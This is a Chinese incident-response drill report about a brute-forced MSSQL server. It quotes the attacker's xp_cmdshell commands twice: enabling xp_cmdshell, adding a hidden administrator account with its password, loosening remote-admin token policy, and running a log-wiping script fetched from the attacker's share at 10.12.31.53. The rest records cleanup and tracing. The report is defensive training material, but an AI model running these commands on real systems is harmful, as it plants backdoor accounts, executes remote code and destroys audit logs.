本稿目的为了介绍应急演练的具体过程,希望能够抛转引玉。
一、响应成果
防守单位: A
事件类型: 发现数据库恶意操作
目标系统名称: xx管理系统
目标系统IP: 10.12.31.50
攻击来源IP: 10.12.31.53
一、发现及研判确认
1>于2020-07-11 10:23:23 发现10.12.31.50数据库存在恶意操作.
“EXEC xp_cmdshell ‘dir B:\\ & dir D:\\’; — priv”
“EXEC xp_cmdshell ‘route print & net share’; — priv”
“EXEC xp_cmdshell ‘net user UpdatusUser CHY524785wqje /add && net localgroup administrators UpdatusUser /add && reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f’; — priv”
“EXEC xp_cmdshell ‘wscript /b C:\\windows\\cleanup.js’; — priv”
“EXEC xp_cmdshell ‘net use \\\\10.12.31.53 /10.12.31.53\\suncljun clj && wscript /b \\\\10.12.31.53\\C$\\windows\\temp\\cleanup.js’; — priv”
“EXEC xp_cmdshell ‘ipconfig /all & whoami’; — priv”
“EXEC sp_configure ‘xp_cmdshell’, 1; RECONFIGURE;”
“EXEC sp_configure ‘show advanced options’, 1; RECONFIGURE;”
2>通过堡垒机登机排查,确定已攻击成功。
![图片[1]-应急响应演练 – 作者:星空111-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200711/1594464831.jpg)
已成功爆破并开启xp_cmdshell
二、处置情况记录
1>查看日志(“EXEC xp_cmdshell ‘wscript /b C:\\windows\\cleanup.js’; — priv“),登机定位cleanup.js木马并对其删除。
“EXEC xp_cmdshell ‘dir B:\\ & dir D:\\’; — priv”
“EXEC xp_cmdshell ‘route print & net share’; — priv”
“EXEC xp_cmdshell ‘net user UpdatusUser CHY524785wqje /add && net localgroup administrators UpdatusUser /add && reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f’; — priv”
“EXEC xp_cmdshell ‘wscript /b C:\\windows\\cleanup.js’; — priv”
“EXEC xp_cmdshell ‘net use \\\\10.12.31.53 /10.12.31.53\\suncljun clj && wscript /b \\\\10.12.31.53\\C$\\windows\\temp\\cleanup.js’; — priv”
“EXEC xp_cmdshell ‘ipconfig /all & whoami’; — priv”
“EXEC sp_configure ‘xp_cmdshell’, 1; RECONFIGURE;”
“EXEC sp_configure ‘show advanced options’, 1; RECONFIGURE;”
![图片[2]-应急响应演练 – 作者:星空111-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200711/1594466857.jpg)
Note:对其解密+美化后,发现确为删除日志文件脚本
2>并对攻击者创建成功的账号进行清除
![图片[3]-应急响应演练 – 作者:星空111-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200711/1594467030.jpg)
![图片[4]-应急响应演练 – 作者:星空111-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200711/1594467077.png)
3>通知运维和业务人员对数据库密码进行强密码修改
4>检查系统日志,发现日志已被黑客清除,说明了cleanup.js木马含有清除入侵痕迹的功能.
![图片[5]-应急响应演练 – 作者:星空111-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200711/1594467256.jpg)
5>对网络进行排查,未发现异常网络连接
![图片[6]-应急响应演练 – 作者:星空111-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200711/1594467872.jpg)
6>对进程、启动项进行排查,未发现可疑进程和启动项
![图片[7]-应急响应演练 – 作者:星空111-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200711/1594468000.jpg)
7>并以受害者ip为攻击机进行检索,未发现有横向渗透行为。
二、溯源
于2020-07-11 18:49:20 发现(10.12.31.50)告警数据库存在恶意操作,攻击者先对(10.12.31.50)的MSSQL进行爆破,远程下载木马cleanup.js,执行cleanup.js木马清除入侵痕迹,创建账号;
三、攻击复现
1>指纹探测、爆破数据库
![图片[8]-应急响应演练 – 作者:星空111-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200711/1594463486.jpg)
![图片[9]-应急响应演练 – 作者:星空111-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200706/1594046853.jpg)
2>开启xp_cmdshell
![图片[10]-应急响应演练 – 作者:星空111-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200711/1594449697.jpg)
开启xp_cmdshell成功
3>运行cmd命令
![图片[11]-应急响应演练 – 作者:星空111-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200711/1594449810.jpg)
来源:freebuf.com 2020-07-13 20:06:04 by: 星空111
请登录后发表评论
注册